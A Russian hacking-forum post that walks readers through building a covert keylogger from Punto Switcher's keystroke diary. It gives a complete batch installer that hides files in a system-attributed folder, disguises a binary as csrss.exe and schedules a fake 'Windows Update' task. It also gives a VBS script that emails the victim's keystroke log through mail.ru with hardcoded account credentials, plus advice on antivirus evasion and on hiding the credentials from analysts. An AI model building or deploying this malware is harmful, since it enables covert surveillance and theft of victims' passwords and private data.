ВАЖНО Делаем приватный кейлоггер с блекджеком и сисястой шлю***

[X-Shar]

Как-то мы уже делали статью о том как можно использовать легальные программы исключительно в своих добрых целях...

На многих форумах я слышал что vbs срипты неопасны, либо непопулярны, поэтому их пропуск АВ некритичен.

В этой теме предлагаю порассуждать на тему кейлоггеров, т.к. RMS надоел уже вкрай...

За основу возьмём Пунто свитчер или как его там неважно:

Хоть автор данного ролика и просил не использовать это в коварных целях, но я неудержался...

Что будет делать наш кейлоггер:

1)Тихонечко ставится без админских прав;
2)Ну разумеется логи будем отправлять на маил, в обход ВСЕХ файерволов и АВ (При настройках по умолчанию разумеется), сделаем это при помощи тулзы Wscript.exe короче скрипта VBS, а эта тулза есть в любой винде и имеет цифровую подпись и файеры её ОЧЕНЬ любят пропускать в сеть...

Итак что-же нам нужно:

1)Файлы этого свитчара, настроенные как в ролике выше (Можно взять во вложении);
2)Винрар, или 7zip неважно, для создание SFX-архива;

Вроде всё итак приступем:

Создадим папку, куда скопируем файлы нашего свитчара, далее сделаем инсталяционный батник и кинем его в эту папку:

Скопировать в буфер обмена

@echo on

set WTime=5

md "%userprofile%\PP"
md "%userprofile%\PP\Data"
md "%userprofile%\PP\User Data"
attrib +s +h +r "%userprofile%\PP"
copy /y "diary.dll" "%userprofile%\PP\diary.dll"
copy /y "diary.exe" "%userprofile%\PP\diary.exe"
copy /y "layouts.exe" "%userprofile%\PP\layouts.exe"
copy /y "libeay32.dll" "%userprofile%\PP\libeay32.dll"
copy /y "csrss.exe" "%userprofile%\PP\csrss.exe"
copy /y "preferences.xml" "%userprofile%\PP\User Data\preferences.xml"
copy /y "ps64ldr.exe" "%userprofile%\PP\ps64ldr.exe"
copy /y "ps.dat" "%userprofile%\PP\Data\ps.dat"
copy /y "pshook64.dll" "%userprofile%\PP\pshook64.dll"
copy /y "pshook.dll" "%userprofile%\PP\pshook.dll"
copy /y "replace.dat" "%userprofile%\PP\User Data\replace.dat"
copy /y "ssleay32.dll" "%userprofile%\PP\ssleay32.dll"
copy /y "translit-en.dat" "%userprofile%\PP\Data\translit-en.dat"
copy /y "translit-ru.dat" "%userprofile%\PP\Data\translit-ru.dat"
copy /y "triggers.dat" "%userprofile%\PP\Data\triggers.dat"
copy /y "user.dic" "%userprofile%\PP\User Data\user.dic"
copy /y "userdata.local" "%userprofile%\PP\userdata.local"
copy /y "UpdateWindows.vbs" "%userprofile%\PP\UpdateWindows.vbs"

sc config Schedule start= auto
sc start Schedule
schtasks /create /sc MINUTE /mo %WTime% /RL HIGHEST /tn "Windows Update" /tr "%userprofile%\PP\UpdateWindows.vbs" /F
start "" "%userprofile%\PP\csrss.exe"

Что делает батник:

Копирует файлы свитчера в рабочую дирректорию жертвы, при этом создаёт хитрую папку pp, почему хитрую, а потому-что её не хера не видно даже если разрешить отображения скрытых папок...

Обратите внимание на:

Скопировать в буфер обмена

schtasks /create /sc MINUTE /mo %WTime% /RL HIGHEST /tn "Windows Update" /tr "%userprofile%\PP\UpdateWindows.vbs" /F

Это создания в планировщике задач скрипта, который и будет отсылать лог на нашу почту, его код:

Скопировать в буфер обмена

Dim WshS
Set WshS = WScript.CreateObject("WScript.Shell")
Set objMsg = CreateObject("CDO.Message")
Set Config = CreateObject("CDO.Configuration")
Set Config = objMsg.Configuration
objMsg.From = "wcwadc@mail.ru"
objMsg.To = "wcwadc@mail.ru"
objMsg.Subject = "Test sending email from script"
objMsg.Textbody = "This is a body of E-mail."

WshS.Run "taskkill /f /im Exp1orer.exe",0

Wscript.Sleep 3000

objMsg.AddAttachment WshS.ExpandEnvironmentStrings("%UserProfile%")+"\PP\User Data\diary.dat"

Config("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
Config("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
Config("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
Config("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Config("http://schemas.microsoft.com/cdo/configuration/sendusername") = "wcwadc"
Config("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "wcwadc888"
Config("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
Config.Fields.Update
objMsg.Send

WshS.Run "Exp1orer.exe"

Wscript.Echo "Отправка завершена"
Wscript.Quit

В vbs всё учёл, даже когда блокируется diary.dat свитчером, приходится завершать процесс перед отправкой, а потом опять запускать наш кейлоггеп, к сожалению задание не всегда устанавливается, поэтому можно придумать что-то другое, например написать простенькую прогу, которая будет запускать скрипт например раз в пять минут...

Как сделать SFX архив здесь:https://ru-sfera.pw/threads/delaem-krutoj-kripto-dzhojner-i-obxodim-detekt-vt.1858/

Ну и самое главное, что ФУД:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Пароль на архив 111, можно распокавать винраром и сконфигурировать как захотите....

 

[X-Shar]

И последнее забыл добавить, мне было лень но можно кое-что улучшить, а именно:

1)Если глянете код, то там пароли от мыла, мыло кстати рабочее с паролями жертв...

Вот что будет если такое попадёт к вирусному аналитегу, он зайдёт и поднасрёт, что-бы такого небыло, можно сделать вот-что, знаю что можно шифровать VBS-скрипт, но при этом что-бы не терялось работоспособность скрипта....

2)Фишка с планировщиком невсегда прокатывает, поэтому всё-же нужно наверное писать свою прогу, которая будет запускать скрипт с промежутком, но это не сложно...

Кстати отправка мыла идёт по зашифрованному протоколу, что затруднит обнаружения, если шифровать код...

Идею взял здесь:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Сборку сделал свою, можно ещё обновить этот пунто свитчер....

Хотя нет пишут что новые версии хуже тырят данные...

Но с конфигами поэкспериментировать можно !